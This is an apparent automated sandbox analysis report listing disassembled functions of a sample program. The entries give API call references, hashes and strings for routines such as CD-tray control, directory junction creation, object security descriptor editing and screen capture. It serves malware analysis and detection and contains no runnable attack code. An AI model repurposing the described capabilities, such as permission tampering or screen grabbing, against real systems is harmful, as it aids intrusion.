                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 3566783562-438819550
                                                                                                                • Opcode ID: 595dfef8d738cc710ef82fea5fdb455abc3f80e2973e1056a126c22388428147
                                                                                                                • Instruction ID: dff9f6318a5a61d7992a44e4b8b68c6206614b75699492770093648c7fe7eb3b
                                                                                                                • Opcode Fuzzy Hash: 595dfef8d738cc710ef82fea5fdb455abc3f80e2973e1056a126c22388428147
                                                                                                                • Instruction Fuzzy Hash: 2C6180B5524305AFC710EF60C885E9BB3E8FF89310F14491AF98987252EB31E959CF96
                                                                                                                Function 0024DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0024DB26
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0024DB73
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024DBBB
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024DBF2
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024DC20
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                • Opcode ID: 6165295f521701847742385670a18de4a5bb183d9c2d787f29cf605454f14b2c
                                                                                                                • Instruction ID: 2e78c9f9b6b0a420cb10083e5e56b6137c4b23f914853a5487ff66874914c26a
                                                                                                                • Opcode Fuzzy Hash: 6165295f521701847742385670a18de4a5bb183d9c2d787f29cf605454f14b2c
                                                                                                                • Instruction Fuzzy Hash: 5B518B71524305AFC304EF10C9818AAB3E8EF98758F50486DF895972A2DB31EE29CF52
                                                                                                                Function 00243110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00274085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00243145
                                                                                                                • LoadStringW.USER32(00000000,?,00274085,00000016), ref: 0024314E
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00274085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00243170
                                                                                                                • LoadStringW.USER32(00000000,?,00274085,00000016), ref: 00243173
                                                                                                                • __swprintf.LIBCMT ref: 002431B3
                                                                                                                • __swprintf.LIBCMT ref: 002431C5
                                                                                                                • _wprintf.LIBCMT ref: 0024326C
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00243283
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                • Opcode ID: 371389b44fc29de6ca8fb37c43052c70dfcb54004a9668060fa4a5d6f3381ab2
                                                                                                                • Instruction ID: 3b07ad5ff0e13650489d10fd5a7dfcdb09dec4012e4acd3d565b3bc3d8f47a09
                                                                                                                • Opcode Fuzzy Hash: 371389b44fc29de6ca8fb37c43052c70dfcb54004a9668060fa4a5d6f3381ab2
                                                                                                                • Instruction Fuzzy Hash: 65412FB1920219BADB14FBE0DD86EDF777CAF14741F500065B605B20D2DA656F28CEA1
                                                                                                                Function 0024D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0024D96C
                                                                                                                • __swprintf.LIBCMT ref: 0024D98E
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0024D9CB
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0024D9F0
                                                                                                                • _memset.LIBCMT ref: 0024DA0F
                                                                                                                • _wcsncpy.LIBCMT ref: 0024DA4B
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0024DA80
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0024DA8B
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0024DA94
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0024DA9E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 2733774712-3457252023
                                                                                                                • Opcode ID: 9104f6e6b422e2f0eecc5ac4cb4ae6021e02a27fccd788c9547f04e87c15b459
                                                                                                                • Instruction ID: e305a8512754f4a51d6c8e726fcefadbaf4ce32875cbcb01fea279550947890c
                                                                                                                • Opcode Fuzzy Hash: 9104f6e6b422e2f0eecc5ac4cb4ae6021e02a27fccd788c9547f04e87c15b459
                                                                                                                • Instruction Fuzzy Hash: 0431C476610219BBDB20DFA4DC89FDA77BCBF84700F0085A5F519D20A1EB709A958BA1
                                                                                                                Function 0026E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0026BD04,?,?), ref: 0026E564
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E57B
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E586
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E593
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0026E59C
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E5AB
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0026E5B4
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E5BB
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E5CC
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0028D9BC,?), ref: 0026E5E5
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0026E5F5
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0026E619
                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0026E644
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0026E66C
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0026E682
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                • Opcode ID: 8c000ac7e4524906e2065b3b83d51dc3a7fb7fdd56f0875435d7bde4fb0e8500
                                                                                                                • Instruction ID: 57d3c7ec33adf2328f8381ef91b7be63e95302b67896ce158e72b471f8eb61f6
                                                                                                                • Opcode Fuzzy Hash: 8c000ac7e4524906e2065b3b83d51dc3a7fb7fdd56f0875435d7bde4fb0e8500
                                                                                                                • Instruction Fuzzy Hash: 0F416C79601205EFDB119F64EC4CEAA7BB8EF89711F104058F906D72A0D730AD54DB20
                                                                                                                Function 00250B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __wsplitpath.LIBCMT ref: 00250C93
                                                                                                                • _wcscat.LIBCMT ref: 00250CAB
                                                                                                                • _wcscat.LIBCMT ref: 00250CBD
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00250CD2
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00250CE6
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00250CFE
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00250D18
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00250D2A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 34673085-438819550
                                                                                                                • Opcode ID: 3a15d61e595f1ecdfe3671fe7901402e1e3f182be8a4c611f8c75aaf9fe06de2
                                                                                                                • Instruction ID: f667b835a14d9be982958711def01ecf2b2a23c53eda6692f7b031ad2e040085
                                                                                                                • Opcode Fuzzy Hash: 3a15d61e595f1ecdfe3671fe7901402e1e3f182be8a4c611f8c75aaf9fe06de2
                                                                                                                • Instruction Fuzzy Hash: D981D3715243069FC724DF64CCC4AAEB3E8AB99306F14892AFC85C7251E730ED98CB56
                                                                                                                Function 0026ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0026ED0C
                                                                                                                • GetFocus.USER32 ref: 0026ED1C
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0026ED27
                                                                                                                • _memset.LIBCMT ref: 0026EE52
                                                                                                                • GetMenuItemInfoW.USER32 ref: 0026EE7D
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0026EE9D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0026EEB0
                                                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0026EEE4
                                                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0026EF2C
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0026EF64
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0026EF99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1296962147-4108050209
                                                                                                                • Opcode ID: 6b25aed58a423cf14e822c5d7c49d78e4b621714f53649bd56134cea703283df
                                                                                                                • Instruction ID: d3d9ed6fc826d57ba627ecb55571c81dd159cb4fdac3fc5ed45832ca28695245
                                                                                                                • Opcode Fuzzy Hash: 6b25aed58a423cf14e822c5d7c49d78e4b621714f53649bd56134cea703283df
                                                                                                                • Instruction Fuzzy Hash: C181E179128312AFDB10CF14D888E6BBBE8FF88314F11092DF99497291D770D9A5CB92
                                                                                                                Function 0023B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0023B903
                                                                                                                  • Part of subcall function 0023B8E7: GetLastError.KERNEL32(?,0023B3CB,?,?,?), ref: 0023B90D
                                                                                                                  • Part of subcall function 0023B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0023B3CB,?,?,?), ref: 0023B91C
                                                                                                                  • Part of subcall function 0023B8E7: HeapAlloc.KERNEL32(00000000,?,0023B3CB,?,?,?), ref: 0023B923
                                                                                                                  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0023B93A
                                                                                                                  • Part of subcall function 0023B982: GetProcessHeap.KERNEL32(00000008,0023B3E1,00000000,00000000,?,0023B3E1,?), ref: 0023B98E
                                                                                                                  • Part of subcall function 0023B982: HeapAlloc.KERNEL32(00000000,?,0023B3E1,?), ref: 0023B995
                                                                                                                  • Part of subcall function 0023B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0023B3E1,?), ref: 0023B9A6
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0023B5F7
                                                                                                                • _memset.LIBCMT ref: 0023B60C
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0023B62B
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 0023B63C
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0023B679
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0023B695
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 0023B6B2
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0023B6C1
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0023B6C8
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0023B6E9
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 0023B6F0
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0023B721
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0023B747
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0023B75B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3996160137-0
                                                                                                                • Opcode ID: c121d332acd1e692e4462add40046af1967ff2cd8e06aa979bd57cdbd3ec56db
                                                                                                                • Instruction ID: 29e1f7cdca4292c7c3717f2205369706ab09e394b657bbf5a16ef665325ebcf6
                                                                                                                • Opcode Fuzzy Hash: c121d332acd1e692e4462add40046af1967ff2cd8e06aa979bd57cdbd3ec56db
                                                                                                                • Instruction Fuzzy Hash: CD514CB591020AAFDF019FA4DC49EEEBB79FF44304F048159FA15AB291DB319A15CF60
                                                                                                                Function 0025A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0025A2DD
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0025A2E9
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0025A2F5
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 0025A302
                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0025A356
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0025A392
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0025A3B6
                                                                                                                • SelectObject.GDI32(00000006,?), ref: 0025A3BE
                                                                                                                • DeleteObject.GDI32(?), ref: 0025A3C7
                                                                                                                • DeleteDC.GDI32(00000006), ref: 0025A3CE
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0025A3D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                • Opcode ID: 5d29af57d02e4883ba8a19d6e4d2c63121f38b7552febc303fc7db7e82cb4c21
                                                                                                                • Instruction ID: 6f6bfdc33754e4fb46154fbaeeba90e58df53e2be97f158e7f08810eaaf5d3b2
                                                                                                                • Opcode Fuzzy Hash: 5d29af57d02e4883ba8a19d6e4d2c63121f38b7552febc303fc7db7e82cb4c21
                                                                                                                • Instruction Fuzzy Hash: D1516775910309EFCB10CFA8DC89EAEBBB9EF48310F14851DF98AA7250C731A855CB64
                                                                                                                Function 00263AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E+
                                                                                                                • API String ID: 3964851224-2060638737
                                                                                                                • Opcode ID: 3ac3759d4a038a59f670c740e755369a8aef1a7c82d77b28b9660abe792899ef
                                                                                                                • Instruction ID: 4d7b960b8a913436485ef8913156e193efd0df0d59f9d4a1cd5f03da9ed679bf
                                                                                                                • Opcode Fuzzy Hash: 3ac3759d4a038a59f670c740e755369a8aef1a7c82d77b28b9660abe792899ef
                                                                                                                • Instruction Fuzzy Hash: 4341A2341302468BDF04EF04D980AEA3365BF65394F550835FC615B29ADB709EB9CF60
                                                                                                                Function 002432B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00273C64,00000010,00000000,Bad directive syntax error,0029DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 002432D1
                                                                                                                • LoadStringW.USER32(00000000,?,00273C64,00000010), ref: 002432D8
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • _wprintf.LIBCMT ref: 00243309
                                                                                                                • __swprintf.LIBCMT ref: 0024332B
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00243395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$",
                                                                                                                • API String ID: 1506413516-2717366030
                                                                                                                • Opcode ID: 90832c938b467bf92a2834c79147480829da576def22034b130fca0bf28c9a62
                                                                                                                • Instruction ID: 86ebb43fa5a49756779e3123f3ef66c06263501758f4e5f7b1f5cc649b52f0ee
                                                                                                                • Opcode Fuzzy Hash: 90832c938b467bf92a2834c79147480829da576def22034b130fca0bf28c9a62
                                                                                                                • Instruction Fuzzy Hash: E4214D3186031DBBDF05EF90DC0AEEE7779BF14700F004456B505A10A2DA72AA78DFA1
                                                                                                                Function 0024D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF), ref: 0024D567
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 0024D589
                                                                                                                • __swprintf.LIBCMT ref: 0024D5DC
                                                                                                                • _wprintf.LIBCMT ref: 0024D68D
                                                                                                                • _wprintf.LIBCMT ref: 0024D6AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove
